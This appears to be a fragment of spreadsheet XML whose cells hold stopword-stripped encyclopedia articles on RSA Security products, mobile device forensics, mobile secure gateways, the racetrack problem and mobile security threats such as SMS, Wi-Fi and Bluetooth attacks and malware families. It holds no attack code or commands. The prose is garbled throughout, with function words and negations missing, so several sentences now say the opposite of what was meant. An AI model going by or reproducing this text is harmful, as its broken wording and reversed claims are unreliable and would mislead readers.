became possible concerns raised 2007 might merit" nist acknowledged problems 2013. products known securid product, provides two-factor authentication hundreds technologies utilizing hardware tokens rotate keys timed intervals, software tokens, time codes. 2016, re-branded securid platform securid access. this release added single-sign-on capabilities cloud authentication resources using saml types federation. securid suite also contains identity governance lifecycle software (formally aveksa). software provides visibility access within organization manages access various capabilities access review, request andprovisioning.rsa envision security information event management (siem) platform, centralised log-management service claims "enable organisations simplify compliance process well optimise security-incident management occur." april 2011, purchased netwitness added group products. netwitness packet capture tool aimed gaining full network visibility detect security incidents. this tool re-branded security analytics combination envision netwitness siem tool packet capture. archer platform software supports business-level management governance, risk management, compliance (grc). product originally developed archer technologies, acquired 2010. also hardware token factoring challenge secret-key challenge bsafe securid software token references</t>
  </si>
  <si>
    <t>Mobile device forensics</t>
  </si>
  <si>
    <t>mobile device forensics branch digital forensics relating recovery digital evidence data mobile device forensically sound conditions. phrase mobile device usually refers mobile phones; however, also relate digital device internal memory communication ability, including devices, devices tablet computers. some mobile companies tried duplicate model phones illegal. many models arriving every year forward step generations. process cloning mobile phones/devices crime widely recognised years, forensic study mobile devices relatively field, dating late 1990s early 2000s. proliferation phones (particularly smartphones) digital devices consumer market caused demand forensic examination devices, could existing computer forensics techniques.mobile devices used save several types personal information contacts, photos, calendars notes, messages. smartphones additionally contain video, email, browsing information, location information, social networking messages contacts. there growing need mobile forensics several reasons prominent reasons are: mobile phones store transmit personal corporate information mobile phones online transactions enforcement, criminals mobile phone devicesmobile device forensics particularly challenging number levels:evidential technical challenges exist. example, cell site analysis following mobile phone usage coverage, exact science. consequently, whilst possible determine roughly cell site zone call made received, possible degree certainty, mobile phone call emanated specific location e.g. residential address. remain competitive, original equipment manufacturers frequently change mobile phone form factors, operating system file structures, data storage, services, peripherals, even connectors cables. result, forensic examiners must different forensic process compared computer forensics. storage capacity continues grow thanks demand powerful "mini computer" type devices. types data also mobile devices used constantly evolve. hibernation behavior processes suspended device powered idle time, remaining active.as result challenges, wide variety tools exist extract evidence mobile devices; tool method acquire evidence devices. therefore recommended forensic examiners, especially wishing qualify expert witnesses court, undergo extensive training order understand tool method acquires evidence; maintains standards forensic soundness; meets legal requirements daubert standard frye standard. history field study, forensic examination mobile devices dates late 1990s early 2000s. role mobile phones crime long recognized enforcement. with increased availability devices consumer market wider array communication platforms support (e.g. email, browsing) demand forensic examination grew.early efforts examine mobile devices used similar techniques first computer forensics investigations: analyzing phone contents directly screen photographing important content. however, proved time-consuming process, number mobile devices began increase, investigators called efficient means extracting data. enterprising mobile forensic examiners sometimes used cell phone synchronization software "back device data forensic computer imaging, sometimes, simply performed computer forensics hard drive suspect computer data synchronized. however, type software could write phone well reading could retrieve deleted data.some forensic examiners found could retrieve even deleted data using "flasher" "twister" boxes, tools developed oems "flash" phone's memory debugging updating. however, flasher boxes invasive change data; complicated use; and, developed forensic tools, perform neither hash verifications cases) audit trails. physical forensic examinations, therefore, better alternatives remain necessary. meet demands, commercial tools appeared allowed examiners recover phone memory minimal disruption analyze separately. over time commercial techniques developed recovery deleted data proprietary mobile devices become possible specialist tools. moreover, commercial tools even automated much extraction process, rendering possible even minimally trained first responders—who currently much likely encounter suspects mobile devices possession, compared computers—to perform basic extractions triage data preview purposes. professional applications mobile device forensics best known application enforcement investigations, also useful military intelligence, corporate investigations, private investigations, criminal civil defense, electronic discovery. types evidence mobile device technology advances, amount types data found mobile device constantly increasing. evidence potentially recovered mobile phone come several different sources, including handset memory, card, attached memory cards cards. traditionally mobile phone forensics associated recovering messaging, well call logs, contact lists phone imei/esn information. however, newer generations smartphones also include wider varieties information; browsing, wireless network settings, geolocation information (including geotags contained within image metadata), e-mail forms rich internet media, including important data—such social networking service posts contacts—now retained smartphone 'apps'. internal memory nowadays mostly flash memory consisting nand types used mobile devices. external memory external memory devices cards, cards (commonly found within devices well mobile phones), cards, cards, memory stick. service provider logs although technically part mobile device forensics, call detail records (and occasionally, text messages) wireless carriers often serve "back evidence obtained mobile phone seized. these useful call history and/or text messages deleted phone, location-based services turned call detail records cell site (tower) dumps show phone owner's location, whether stationary moving (i.e., whether phone's signal bounced side single tower, different sides multiple towers along particular path travel). carrier data device data together used corroborate information sources, instance, video surveillance footage eyewitness accounts; determine general location non-geotagged image video taken. european union requires member countries retain certain telecommunications data investigations. this includes data calls made retrieved. location mobile phone determined geographical data must also retained. united states, however, requirement exists, standards govern long carriers retain data even must retain. example, text messages retained week two, call logs retained anywhere weeks several months. reduce risk evidence lost, enforcement agents must submit preservation letter carrier, must back search warrant. forensic process forensics process mobile devices broadly matches branches digital forensics; however, particular concerns apply. generally, process broken three main categories: seizure, acquisition, examination/analysis. other aspects computer forensic process, intake, validation, documentation/reporting, archiving still apply. seizure seizing mobile devices covered legal considerations digital media. mobiles often recovered switched seizure preserve evidence, device often transported state avoid shutdown, would change files. addition, investigator first responder would risk user lock activation. however, leaving phone carries another risk: device still make network/cellular connection. this bring data, overwriting evidence. prevent connection, mobile devices often transported examined within faraday cage bag). even disadvantages method. first, bags render device unusable, touch screen keypad cannot used. however, special cages acquired allow device see-through glass special gloves. advantage option ability also connect forensic equipment blocking network connection, well charging device. option available, network isolation advisable either placing device airplane mode, cloning card technique also useful device missing card entirely).it note technique prevent triggering remote wipe tampering) device, anything local dead man's switch. acquisition second step forensic process acquisition, case usually referring retrieval material device compared bit-copy imaging used computer forensics).due proprietary nature mobiles often possible acquire data powered down; mobile device acquisition performed live. with advanced smartphones using advanced memory management, connecting recharger putting faraday cage good practice. mobile device would recognize network disconnection therefore would change status information trigger memory manager write data.most acquisition tools mobile devices commercial nature consist hardware software component, often automated. examination analysis increasing number mobile devices high-level file systems, similar file systems computers, methods tools taken hard disk forensics need slight changes.the file system generally used nand memory. difference block size used, larger bytes hard disks depends used memory type, e.g., type 128, nand memory 128, 256, kilobyte. different software tools extract data memory image. could specialized automated forensic software products generic file viewers editor search characteristics file headers. advantage editor deeper insight memory management, working editor means handwork file system well file header knowledge. contrast, specialized forensic software simplifies search extracts data find everything. accessdata, sleuthkit, analyst encase, mention some, forensic software products analyze memory images. since tool extracts possible information, advisable tools examination. there currently (february 2010) software solution evidences flash memories. data acquisition types mobile device data extraction classified according continuum, along methods become technical “forensically sound,” tools become expensive, analysis takes longer, examiners need training, methods even become invasive. manual acquisition examiner utilizes user interface investigate content phone's memory. therefore, device used normal, examiner taking pictures screen's contents. this method advantage operating system makes unnecessary specialized tools equipment transform data human interpretable information. practice method applied cell phones, pdas navigation systems. disadvantages data visible operating system recovered; data available form pictures; process time-consuming. logical acquisition logical acquisition implies bit-by-bit copy logical storage objects (e.g., directories files) reside logical storage (e.g., file system partition). logical acquisition advantage system data structures easier tool extract organize. logical extraction acquires information device using original equipment manufacturer application programming interface synchronizing phone's contents personal computer. logical extraction generally easier work produce large binary blob. however, skilled forensic examiner able extract information physical extraction. file system acquisition logical extraction usually produce deleted information, normally removed phone's file system. however, cases—particularly platforms built sqlite, android—the phone keep database file information overwrite information simply marks deleted available later overwriting. cases, device allows file system access synchronization interface, possible recover deleted information. file system extraction useful understanding file structure, browsing history, usage, well providing examiner ability perform analysis traditional computer forensic tools. physical acquisition physical acquisition implies bit-for-bit copy entire physical store (e.g. flash memory); therefore, method similar examination personal computer. physical acquisition advantage allowing deleted files data remnants examined. physical extraction acquires information device direct access flash memories. generally harder achieve device original equipment manufacturer needs secure arbitrary reading memory; therefore, device locked certain operator. around security, mobile forensics tool vendors often develop boot loaders, enabling forensic tool access memory (and often, also bypass user passcodes pattern locks).generally physical extraction split steps, dumping phase decoding phase. brute force acquisition brute force acquisition performed party passcode brute force tools send series passcodes passwords mobile device. this time-consuming method, effective nonetheless. this technique uses trial error attempt create correct combination password authenticate access mobile device. despite process taking extensive amount time, still best methods employ forensic professional unable obtain passcode. with current available software hardware become quite easy break encryption mobile device's password file obtain passcode. manufacturers become public since release iphone5, cellebrite grayshift. these manufacturers intended enforcement agencies police departments. cellebrite ufed ultimate unit costs $40,000 dollars grayshifts system costs $15,000. brute forcing tools connected device physically send codes devices starting 0000 9999 sequence correct code successfully entered. once code entry successful, full access device given data extraction commence. tools early investigations consisted live manual analysis mobile devices; examiners photographing writing useful material evidence. without forensic photography equipment fernico zrt, edec eclipse, project-a-phone, disadvantage risking modification device content, well leaving many parts proprietary operating system inaccessible. recent years number hardware/software tools emerged recover logical physical evidence mobile devices. most tools consist hardware software portions. hardware includes number cables connect mobile device acquisition machine; software exists extract evidence and, occasionally, even analyze most recently, mobile device forensic tools developed field. this response military units' demand fast accurate anti-terrorism intelligence, enforcement demand forensic previewing capabilities crime scene, search warrant execution, exigent circumstances. such mobile forensic tools often ruggedized harsh environments (e.g. battlefield) rough treatment (e.g. dropped submerged water).generally, impossible tool capture evidence mobile devices, mobile forensic professionals recommend examiners establish entire toolkits consisting commercial, open source, broad support, narrow support forensic tools, together accessories battery chargers, faraday bags signal disruption equipment, forth. commercial forensic tools some current tools include belkasoft evidence center, cellebrite ufed, oxygen forensic detective, elcomsoft mobile forensic bundle, susteen secure view, mobiledit forensic express, micro systemation xry. some tools additionally developed address increasing criminal usage phones manufactured chinese chipsets, include mediatek (mtk), spreadtrum mstar. such tools include cellebrite's chinex, pinpoint. open source most open source mobile forensics tools platform-specific geared toward smartphone analysis. though originally designed forensics tool, bitpim widely used cdma phones well vx4400/vx6000 many sanyo sprint cell phones. physical tools forensic desoldering commonly referred "chip-off" technique within industry, last intrusive method memory image desolder non-volatile memory chip connect memory chip reader. this method contains potential danger total data destruction: possible destroy chip content heat required desoldering. before invention technology possible attach probes pins memory chip recover memory probes. technique bonds chips directly onto molten solder balls, longer possible attach probes. desoldering chips done carefully slowly, heat destroy chip data. before chip desoldered baked oven eliminate remaining water. this prevents so-called popcorn effect, remaining water would blow chip package desoldering. there mainly three methods melt solder: air, infrared light, steam-phasing. infrared light technology works focused infrared light beam onto specific integrated circuit used small chips. steam methods cannot focus much infrared technique. chip re-balling after desoldering chip re-balling process cleans chip adds balls chip. re-balling done different ways. first stencil. stencil chip-dependent must exactly. then tin-solder stencil. after cooling stencil removed necessary second cleaning step done. second method laser re-balling. here stencil programmed re-balling unit. bondhead (looks like tube/needle) automatically loaded ball solder ball singulation tank. ball heated laser, tin-solder ball becomes fluid flows onto cleaned chip. instantly melting ball laser turns ball falls bondhead. while reloading bondhead re-balling unit changes position next pin.a third method makes entire re-balling process unnecessary. chip connected adapter y-shaped springs spring-loaded pogo pins. y-shaped springs need ball onto establish electric connection, pogo pins used directly pads chip without balls.the advantage forensic desoldering device need functional copy without changes original data made. disadvantage re-balling devices expensive, process costly risks total data loss. hence, forensic desoldering done experienced laboratories. jtag existing standardized interfaces reading data built several mobile devices, e.g., position data equipment (nmea) deceleration information airbag units.not mobile devices provide standardized interface exist standard interface mobile devices, manufacturers problem common. miniaturizing device parts opens question automatically test functionality quality soldered integrated components. problem industry group, joint test action group (jtag), developed test technology called boundary scan. despite standardization four tasks jtag device interface used recover memory. find correct bits boundary scan register must know processor memory circuits used connected system bus. when accessible outside must find test points jtag interface printed circuit board determine test point used signal. jtag port always soldered connectors, sometimes necessary open device re-solder access port. protocol reading memory must known finally correct voltage must determined prevent damage circuit.the boundary scan produces complete forensic image volatile non-volatile memory. risk data change minimized memory chip desoldered. generating image slow mobile devices jtag enabled. also, difficult find test access port. command line tools system commands mobile devices provide possibility boot connecting network share another device clean tools. therefore, system commands could save volatile memory mobile device. with risk modified system commands must estimated volatile memory really important. similar problem arises network connection available secondary memory connected mobile device volatile memory image must saved internal non-volatile memory, user data stored likely deleted important data lost. system commands cheapest method, imply risks data loss. every command usage options output must documented. commands commands modem commands, e.g., hayes command motorola phone commands, therefore used device modem support. using commands obtain information operating system, deleted data extracted. external memory flash drive, appropriate software, e.g., unix command needed make bit-level copy. furthermore, flash drives memory protection need special hardware connected computer. many drives memory cards write-lock switch used prevent data changes, making copy. drive protection switch, blocker used mount drive read-only mode exceptional case, memory chip desoldered. memory cards need card reader make copy. card soundly analyzed, possible recover (deleted) data like contacts text messages.the android operating system includes command. blog post android forensic techniques, method live image android device using command demonstrated. non-forensic commercial tools flasher tools flasher tool programming hardware and/or software used program (flash) device memory, e.g., eeprom flash memory. these tools mainly originate manufacturer service centers debugging, repair, upgrade services. they overwrite non-volatile memory some, depending manufacturer device, also read memory make copy, originally intended backup. memory protected reading, e.g., software command destruction fuses read circuit.note, would prevent writing using memory internally cpu. flasher tools easy connect use, change data dangerous options make complete copy. controversies general exists standard constitutes supported device specific product. this situation different vendors define supported device differently. situation makes much harder compare products based vendor provided lists supported devices. instance device logical extraction using product produces list calls made device listed supported vendor another vendor produce much information. furthermore, different products extract different amounts information different devices. this leads complex landscape trying overview products. general leads situation testing product extensively purchase strongly recommended. quite common least products complement other. mobile phone technology evolving rapid pace. digital forensics relating mobile devices seems stand still evolving slowly. mobile phone forensics catch release cycles mobile phones, comprehensive depth framework evaluating mobile forensic toolkits developed data appropriate tools techniques type phone made available timely manner. anti-forensics anti-computer forensics difficult small size devices user's restricted data accessibility. nevertheless, developments secure memory hardware security circuits memory chip, memory chip cannot read even desoldering. also list digital forensics tools telephones portal references external links conference 'mobile forensics world' chip-off forensics (forensicwiki.org) jtag forensics (forensicwiki.org) mobile phone forensics case studies (qcc global ltd)</t>
  </si>
  <si>
    <t>Mobile secure gateway</t>
  </si>
  <si>
    <t>mobile secure gateway (msg) industry term software hardware appliance provides secure communication mobile application respective backend resources typically within corporate network. addresses challenges field mobile security. typically composed components client library gateway. client library linked mobile application. establishes secure connectivity gateway using cryptographic protocol typically ssl/tls. this represents secured channel used communication mobile application hosts. gateway separates internal infrastructure internet, allowing authorized client requests reach specific hosts inside restricted network. client library client library linked corresponding mobile application, provides secure access gateway hosts. client library exposes public mobile application, mimicking platform default http client library. application uses communicate desired hosts secure way. gateway gateway server daemon typically installed onto physical virtual appliance placed dmz. gateway's public interface exposed internet untrusted network) accepts tcp/ip connections mobile applications. operates ipv4 and/or ipv6 networks. incoming client connections typically ssl/tls provide security network communication mutual trust communicating peers. communication protocol typically based http. host gateway forwards requests connected apps collection configured hosts. these typically http https servers services within internal network. response host sent back respective mobile app. references</t>
  </si>
  <si>
    <t>Racetrack problem</t>
  </si>
  <si>
    <t>racetrack problem specific instance type race condition. racetrack problem flaw system process whereby output and/or result process unexpectedly critically dependent sequence timing events circular pattern. this problem semantically different race condition circular nature problem. term originates idea signals racing circular motion influence output first. racetrack problems occur electronics systems, especially logic circuits, computer software, especially multithreaded distributed programs. also concurrency control deadlock synchronization therac-25 external links starvation critical race analyzers paper "algorithms optimal state assignment asynchronous state machines" robert fuhrer, bill steven nowick paper novel framework solving state assignment problem event-based specifications" luciano lavagno, moon, robert brayton alberto sangiovanni-vincentelli article "secure programmer: prevent race conditions—resource contention used you" david wheeler chapter "avoid race conditions" (secure programming linux unix howto) race conditions, security, immutability java, sample source code comparison code, chiral software</t>
  </si>
  <si>
    <t>Mobile security</t>
  </si>
  <si>
    <t>mobile security, mobile device security, protection smartphones, tablets, laptops threats associated wireless computing. become increasingly important mobile computing. security personal business information stored smartphones particular concern. more users businesses smartphones communicate, also plan organize users' work private life. within companies, technologies causing profound changes organization information systems therefore become source risks. indeed, smartphones collect compile increasing amount sensitive information access must controlled protect privacy user intellectual property company. smartphones, computers, preferred targets attacks. this devices family photos, pictures pets, passwords, more. attackers, items digital passport access everything would need know person. this attacks mobile devices rise. these attacks exploit weaknesses inherent smartphones come communication mode—like short message service (sms, text messaging), multimedia messaging service (mms), wifi, bluetooth gsm, facto global standard mobile communications. there also exploits target software vulnerabilities browser operating system malicious software relies weak knowledge average user. security countermeasures developed applied smartphones, security different layers software dissemination information users. there good practices observed levels, design use, development operating systems, software layers, downloadable apps. challenges smartphone mobile security threats smartphone user exposed various threats phone. last two-quarters 2012, number unique mobile threats grew 261%, according research. these threats disrupt operation smartphone, transmit modify user data. applications must guarantee privacy integrity information handle. addition, since apps could malware, functionality activities limited (for example, restricting apps accessing location information gps, blocking access user's address book, preventing transmission data network, sending messages billed user, etc.). since recent rise mobile attacks, hackers increasingly targeted smartphones credential theft snooping. number attacks targeting smartphones devices risen percent. according study, mobile banking applications responsible increase attacks. malware distributed attackers take targets' transaction information, rights money. various types malware also developed anti-detection techniques avoid detection. triade malware comes pre-installed mobile devices. addition haddad, lotoor, exploits vulnerabilities system repackage legitimate applications. devices also vulnerable spyware leaky behaviors applications. devices connected public networks risk attacks. mobile devices also effective conveyance systems malware threats, breaches information, thefts. potential attackers looking possible weak points apple's iphone first android devices came onto market. department homeland security's cybersecurity department claims number vulnerable points smartphone operating systems increased. mobile phones connected utilities appliances, hackers, cybercriminals, even intelligence officials access devices.it became increasingly popular employees devices work-related purposes 2011. crowd research partners study, published 2017, reports 2017, businesses mandated mobile devices subjected malware attacks breaches. become common rogue applications installed user devices without user's permission. they breach privacy, hinders effectiveness devices. well affecting device, hidden malware harmful. mobile malware developed exploit vulnerabilities mobile devices. ransomware, worms, botnets, trojans, viruses types. since introduction mobile banking apps apps, vital targets hackers, malware rampant. trojan-droppers also avoid detection malware. attackers malware device able avoid detection hiding malicious code. despite fact malware inside device change, dropper generates hashes time. additionally, droppers also create multitude files, lead creation viruses. android mobile devices prone trojan-droppers. banking trojans also enable attacks banking applications phone, leads theft data stealing money funds. additionally, jailbreaks devices, work disabling signing codes iphones applications downloaded store operated. way, protection layers offered disrupted, exposing device malware. these outside applications sandbox, result, exposes potential security problems. installing malicious credentials virtual private networks direct information malicious systems, attack vectors developed change mobile devices' configuration settings. addition, spyware tends installed mobile devices order track individual. malicious apps also installed without owners' permission knowledge. wi-fi interference technologies also attack mobile devices potentially insecure networks. compromising network, hackers able gain access data. vpn, hand, used secure networks. soon system threatened, active operate. there also social engineering techniques, phishing. with phishing, unsuspecting victims sent links lead malicious websites. attackers hack victim's device copy information. however, mobile device attacks prevented technologies. containerization example, allows creation hardware infrastructure separates business data data. detecting malicious traffic rogue access points, network protection. data security also ensured authentication.there three prime targets attackers: data: smartphones devices data management, contain sensitive data like credit card numbers, authentication information, private information, activity logs (calendar, call logs); identity: smartphones highly customizable, device contents easily associated specific person. availability: attacking smartphone limit access deprive owner use.there number threats mobile devices, including annoyance, stealing money, invading privacy, propagation, malicious tools. vulnerability mobile devices weak spot allow attacker decrease systems security. there three elements intercepts vulnerability occurs system weakness, attacker access flaw, attacker competence exploit flaw. botnets: attackers infect multiple machines malware victims generally acquire e-mail attachments compromised applications websites. malware gives hackers remote control "zombie" devices, instructed perform harmful acts. malicious applications: hackers upload malicious programs games third-party smartphone application marketplaces. programs steal personal information open backdoor communication channels install additional applications cause problems. malicious links social networks: effective spread malware hackers place trojans, spyware, backdoors. spyware: hackers hijack phones, allowing hear calls, text messages e-mails well track someone's location updates.the source attacks actors found non-mobile computing space: professionals, whether commercial military, focus three targets mentioned above. they steal sensitive data general public, well undertake industrial espionage. they also identity attacked achieve attacks; thieves want gain income data identities stolen. thieves attack many people increase potential income; black hackers specifically attack availability. their goal develop viruses, cause damage device. cases, hackers interest stealing data devices. grey hackers reveal vulnerabilities. their goal expose vulnerabilities device. grey hackers intend damaging device stealing data. consequences when smartphone infected attacker, attacker attempt several things: attacker manipulate smartphone zombie machine, say, machine attacker communicate send commands used send unsolicited messages (spam) email; attacker easily force smartphone make phone calls. example, (library contains basic functions present smartphone) phonemakecall microsoft, collects telephone numbers source yellow pages, call them. attacker also method call paid services, resulting charge owner smartphone. also dangerous smartphone could call emergency services thus disrupt services; compromised smartphone record conversations user others send third party. this cause user privacy industrial security problems; attacker also steal user's identity, usurp identity (with copy user's card even telephone itself), thus impersonate owner. this raises security concerns countries smartphones used place orders, view bank accounts used identity card; attacker reduce usability smartphone, discharging battery. example, launch application continuously smartphone processor, requiring energy draining battery. factor distinguishes mobile computing traditional desktop limited performance. frank stajano ross anderson first described form attack, calling attack "battery exhaustion" "sleep deprivation torture"; attacker also prevent operation and/or smartphone making unusable. this attack either delete boot scripts, resulting phone without functioning modify certain files make unusable (e.g. script launches startup forces smartphone restart) even embed startup application would empty battery; attacker remove personal (photos, music, videos, etc.) professional data (contacts, calendars, notes) user. attacks based communication attack based some attacks derive flaws management mms. some mobile phone models problems managing binary messages. possible, sending ill-formed block, cause phone restart, leading denial service attacks. user siemens received text message containing chinese character, would lead denial service. another case, standard requires maximum size nokia mail address characters, nokia phones verify standard, user enters email address characters, leads complete dysfunction e-mail handler puts commission. this attack called "curse silence". study safety infrastructure revealed messages sent internet used perform distributed denial service (ddos) attack mobile telecommunications infrastructure city. attack exploits delays delivery messages overload network. another potential attack could begin phone sends phones, attachment. this attachment infected virus. upon receipt mms, user choose open attachment. opened, phone infected, virus sends infected attachment contacts address book. there real-world example attack: virus commwarrior uses address book sends messages including infected file recipients. user installs software, received message. then, virus began send messages recipients taken address book. attacks based communication networks attacks based networks attacker break encryption mobile network. network encryption algorithms belong family algorithms called policy security obscurity possible openly test robustness algorithms. there originally variants algorithm: a5/1 a5/2 (stream ciphers), former designed relatively strong, latter designed weak purpose allow easy cryptanalysis eavesdropping. etsi forced countries (typically outside europe) a5/2. since encryption algorithm made public, proved possible break encryption: a5/2 could broken fly, a5/1 hours july 2007, 3gpp approved change request prohibit implementation a5/2 mobile phones, means decommissioned longer implemented mobile phones. stronger public algorithms added standard, a5/3 a5/4 (block ciphers), otherwise known kasumi uea1 published etsi. network support a5/1, algorithm implemented phone, base station specify a5/0 null algorithm, whereby radio traffic sent unencrypted. even case mobile phones able much stronger encryption gsm, base station downgrade radio communication specify a5/0 encryption) this basis eavesdropping attacks mobile radio networks using fake base station commonly called imsi catcher. addition, tracing mobile terminals difficult since time mobile terminal accessing accessed network, temporary identity (tmsi) allocated mobile terminal. tmsi used identity mobile terminal next time accesses network. tmsi sent mobile terminal encrypted messages. once encryption algorithm broken, attacker intercept unencrypted communications made victim's smartphone. attacks based wi-fi attacker eavesdrop wi-fi communications derive information (e.g. username, password). this type attack unique smartphones, vulnerable attacks often wi-fi means communication access internet. security wireless networks (wlan) thus important subject. initially, wireless networks secured keys. weakness short encryption connected clients. addition, several reductions search space keys found researchers. now, wireless networks protected security protocol. based "temporal integrity protocol (tkip)" designed allow migration equipment already deployed. major improvements security dynamic encryption keys. small networks, "pre-shared key" based shared key. encryption vulnerable length shared short. with limited opportunities input (i.e. numeric keypad), mobile phone users might define short encryption keys contain numbers. this increases likelihood attacker succeeds brute-force attack. successor wpa, called wpa2, supposed safe enough withstand brute force attack. free wi-fi usually provided organizations airports, coffee shops, restaurants number reasons. addition spending time premises, wi-fi access helps stay productive. it's likely they'll spending money spend time premises. enhancing customer tracking another reason. restaurants coffee shops compile data customers target advertisements directly devices. this means customers know services facility provides. generally, individuals filter business premises based internet connections another reason gain competitive edge. ability access free fast wi-fi gives business edge not. network security responsibility organizations. there numerous risks associated unsecured wi-fi networks, however. man-in-the-middle attack entails interception modification data parties. additionally, malware distributed free wi-fi network hackers exploit software vulnerabilities smuggle malware onto connected devices. also possible eavesdrop sniff wifi signals using special software devices, capturing login credentials hijacking accounts.as gsm, attacker succeeds breaking identification key, possible attack phone also entire network connected many smartphones wireless lans remember already connected, mechanism prevents user re-identify connection. however, attacker could create wifi access point twin parameters characteristics real network. using fact smartphones remember networks, could confuse networks connect network attacker intercept data transmit data encrypted form.lasco worm initially infects remote device using file format. file format (software installation script) script file executed system without user interaction. smartphone thus believes file come trusted source downloads infecting machine. principle bluetooth-based attacks security issues related bluetooth mobile devices studied shown numerous problems different phones. easy exploit vulnerability: unregistered services require authentication, vulnerable applications virtual serial port used control phone. attacker needed connect port take full control device. another example: phone must within reach bluetooth discovery mode. attacker sends file bluetooth. recipient accepts, virus transmitted. example: cabir worm spreads bluetooth connection. worm searches nearby phones bluetooth discoverable mode sends target device. user must accept incoming file install program. after installing, worm infects machine. attacks based vulnerabilities software applications other attacks based flaws applications phone. browser mobile browser emerging attack vector mobile devices. just common browsers, mobile browsers extended pure navigation widgets plug-ins, completely native mobile browsers. jailbreaking iphone firmware 1.1.1 based entirely vulnerabilities browser. result, exploitation vulnerability described underlines importance browser attack vector mobile devices. case, vulnerability based stack-based buffer overflow library used browser (libtiff). vulnerability browser android discovered october 2008. iphone vulnerability above, obsolete vulnerable library. significant difference iphone vulnerability android's sandboxing architecture limited effects vulnerability browser process. smartphones also victims classic piracy related web: phishing, malicious websites, software background, etc. difference smartphones strong antivirus software available.the internet offers numerous interactive features ensure higher engagement rate, capture relevant data, increase brand loyalty. blogs, forums, social networks, wikis common interactive websites. tremendous growth internet, rapid rise number security breaches experienced individuals businesses past years. users balance need utilize interactive features also maintaining caution regarding security issues several ways. reviewing computer security regularly correcting, upgrading, replacing necessary features ways this. installation antivirus anti-spyware programs effective protecting computer, offer protection malware, spyware, viruses. well, firewalls, typically installed internet computer network order find balance. acting server, firewall prevents external users accessing internal computer system. also, secure passwords sharing help maintain balance. operating system sometimes possible overcome security safeguards modifying operating system itself. real-world examples, section covers manipulation firmware malicious signature certificates. these attacks difficult. 2004, vulnerabilities virtual machines running certain devices revealed. possible bypass bytecode verifier access native underlying operating system. results research published detail. firmware security nokia's symbian platform security architecture (psa) based central configuration file called swipolicy. 2008 possible manipulate nokia firmware installed, fact downloadable versions file human-readable, possible modify change image firmware. this vulnerability solved update nokia. theory, smartphones advantage hard drives since files rom, cannot changed malware. however, systems possible circumvent this: symbian possible overwrite file file name. windows possible change pointer general configuration file editable file. when application installed, signing application verified series certificates. create valid signature without using valid certificate list. symbian certificates directory: c:\resource\swicertstore\dat. with firmware changes explained easy insert seemingly valid malicious certificate. android attacked most. because users among operation systems. according cybersecurity company, reported blocked millions attack 2016. attacks based hardware vulnerabilities electromagnetic waveforms 2015, researchers french government agency agence nationale sécurité systèmes d'information (anssi) demonstrated capability trigger voice interface certain smartphones remotely using "specific electromagnetic waveforms". exploit took advantage antenna-properties headphone wires plugged audio-output jacks vulnerable smartphones effectively spoofed audio input inject commands audio interface. juice jacking juice jacking physical hardware vulnerability specific mobile platforms. utilizing dual purpose charge port, many devices susceptible data exfiltrated from, malware installed onto mobile device utilizing malicious charging kiosks public places hidden normal charge adapters. jail-breaking rooting jail-breaking also physical access vulnerability, mobile device users initiate hack devices unlock exploit weaknesses operating system. mobile device users take control device jail-breaking customize interface installing applications, change system settings allowed devices. thus, allowing tweak mobile devices operating systems processes, programs background, thus devices expose variety malicious attack lead compromise important private data. password cracking 2010, researcher university pennsylvania investigated possibility cracking device's password smudge attack (literally imaging finger smudges screen discern user's password). researchers able discern device password time certain conditions. outsiders perform over-the-shoulder victims, watching specific keystrokes pattern gestures, unlock device password passcode. malicious software (malware) smartphones permanent point access internet (mostly on), compromised easily computers malware. malware computer program aims harm system resides. mobile malware variants increased year 2017. trojans, worms viruses considered malware. trojan program smartphone allows external users connect discreetly. worm program reproduces multiple computers across network. virus malicious software designed spread computers inserting legitimate programs running programs parallel. however, must said malware less numerous important smartphones computers. nonetheless, recent studies show evolution malware smartphones rocketed last years posing threat analysis detection. three phases malware attacks typically attack smartphone made malware takes place phases: infection host, accomplishment goal, spread malware systems. malware often uses resources offered infected smartphones. output devices bluetooth infrared, also address book email address person infect user's acquaintances. malware exploits trust given data sent acquaintance. infection infection means used malware smartphone, either faults previously presented gullibility user. infections classified four classes according degree user interaction: explicit permission benign interaction user allowed infect machine, clearly indicating potential malicious behavior. this typical behavior proof concept malware. implied permission this infection based fact user habit installing software. most trojans seduce user installing attractive applications (games, useful applications etc.) actually contain malware. common interaction this infection related common behavior, opening email. interaction last class infection dangerous. indeed, worm could infect smartphone could infect smartphones without interaction would catastrophic. accomplishment goal once malware infected phone also seek accomplish goal, usually following: monetary damage, damage data and/or device, concealed damage: monetary damages attacker steal user data either sell user sell third party. damage malware partially damage device, delete modify data device. concealed damage aforementioned types damage detectable, malware also leave backdoor future attacks even conduct wiretaps. spread systems once malware infected smartphone, always aims spread another: spread proximate devices using wi-fi, bluetooth infrared; also spread using remote networks telephone calls emails. examples malware here various malware exist world smartphones short description each. viruses trojans cabir (also known caribe, sybmos/cabir, symbian/cabir epoc.cabir) name computer worm developed 2004, designed infect mobile phones running symbian believed first computer worm infect mobile phones commwarrior, found march 2005, first worm infect many machines mms. sent commwarrior.zip containing file commwarrior.sis. when file executed, commwarrior attempts connect nearby devices bluetooth infrared random name. attempts send message contacts smartphone different header messages person, receive often open without verification. phage first palm virus discovered. transfers palm synchronization. infects applications smartphone embeds code function without user system detecting system detect usual applications functioning. redbrowser trojan based java. trojan masquerades program called "redbrowser" allows user visit sites without connection. during application installation, user sees request phone application needs permission send messages. user accepts, redbrowser send paid call centers. this program uses smartphone's connection social networks (facebook, twitter, etc.) contact information user's acquaintances (provided required permissions given) send messages. wince.pmcryptic.a malicious software windows mobile aims earn money authors. uses infestation memory cards inserted smartphone spread effectively. cardtrap virus available different types smartphone, aims deactivate system third-party applications. works replacing files used start smartphone applications prevent executing. there different variants virus cardtrap.a symbos devices. also infects memory card malware capable infecting windows. ghost push malicious software android automatically roots android device installs malicious applications directly system partition unroots device prevent users removing threat master reset (the threat removed reflashing). cripples system resources, executes quickly, hard detect. ransomware mobile ransomware type malware locks users mobile devices pay-to-unlock-your-device ploy, grown leaps bounds threat category since 2014. specific mobile computing platforms, users often less security-conscious, particularly pertains scrutinizing applications links trusting native protection capability mobile device operating system. mobile ransomware poses significant threat businesses reliant instant access availability proprietary information contacts. likelihood traveling businessman paying ransom unlock device significantly higher since disadvantage given inconveniences timeliness less likely direct access staff. recent ransomware attack caused stir world attack caused many internet connected devices work companies spent large amount recover attacks. spyware flexispy application considered trojan, based symbian. program sends information received sent smartphone flexispy server. originally created protect children adulterous spouses. number malware below diagram loads different behaviors smartphone malware terms effects smartphones: graph least malware varieties exhibit negative behavior, except ability spread. portability malware across platforms there multitude 